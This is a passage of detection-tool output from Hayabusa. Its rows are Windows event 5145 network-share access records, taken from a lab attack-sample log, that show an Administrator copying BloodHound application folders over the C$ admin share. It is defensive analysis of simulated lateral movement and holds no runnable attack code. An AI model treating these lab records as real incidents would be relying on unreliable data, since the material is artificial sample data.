Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\components : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\icons : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\components : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\icons : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is\cjs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is\umd : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-lifecycles-compat : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\__test__ : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\__test__\__snapshots__ : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\coverage : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\coverage\lcov-report : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.279 
+09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\docs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\docs\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: 
\\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\examples\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\__tests__ : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\config : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\node_modules\react-prop-toggle : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\doc : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\doc\wg-meetings : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\lib\internal : IP 
Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\regenerator-runtime : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src\shims : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\rimraf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\safe-buffer : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler\cjs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler\umd : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\setimmediate : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\signal-exit : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\ssf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\ssf\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-chain : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share 
Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-chain\tests : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\filters : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\streamers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\tests : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\string_decoder : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\string_decoder\lib : IP Address: 